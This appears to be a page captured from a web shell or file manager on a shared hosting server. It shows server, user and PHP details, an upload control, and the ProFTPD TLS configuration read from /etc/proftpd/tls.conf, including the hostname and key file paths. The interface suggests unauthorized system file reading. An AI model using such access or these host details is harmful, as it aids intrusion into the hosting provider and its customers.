HEX
Server: Apache/2.4.67 (Debian)
System: Linux hosting103 6.1.0-49-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
User: muzikaecom (1013)
PHP: 8.3.31
Disabled: NONE
Upload Files
File: //etc/proftpd/tls.conf
<IfModule mod_tls.c>
  TLSEngine                               on
  TLSLog                                  /var/log/proftpd/tls.log
  TLSProtocol                             TLSv1.2 TLSv1.3

  TLSCipherSuite                          HIGH:!aNULL:!MD5

  TLSRSACertificateFile                   /etc/proftpd/server.crt
  TLSRSACertificateKeyFile                /etc/proftpd/server.key

  TLSCACertificateFile                    /etc/proftpd/ca.crt
  TLSVerifyClient                         off
  TLSRequired                             off
  TLSOptions                              EnableDiags NoSessionReuseRequired
  RequireValidShell                       no

  <VirtualHost hosting103.resellerdns.nl>
    TLSEngine on
    TLSOptions UseImplicitSSL

    Port 990
    TLSLog                                  /var/log/proftpd/tls.log

    TLSRSACertificateFile                   /etc/proftpd/server.crt
    TLSRSACertificateKeyFile                /etc/proftpd/server.key

    TLSCACertificateFile                    /etc/proftpd/ca.crt
    TLSVerifyClient                         off
    TLSRequired                             on
    TLSOptions                              NoSessionReuseRequired
    RequireValidShell                       no
  </VirtualHost>
  </IfModule>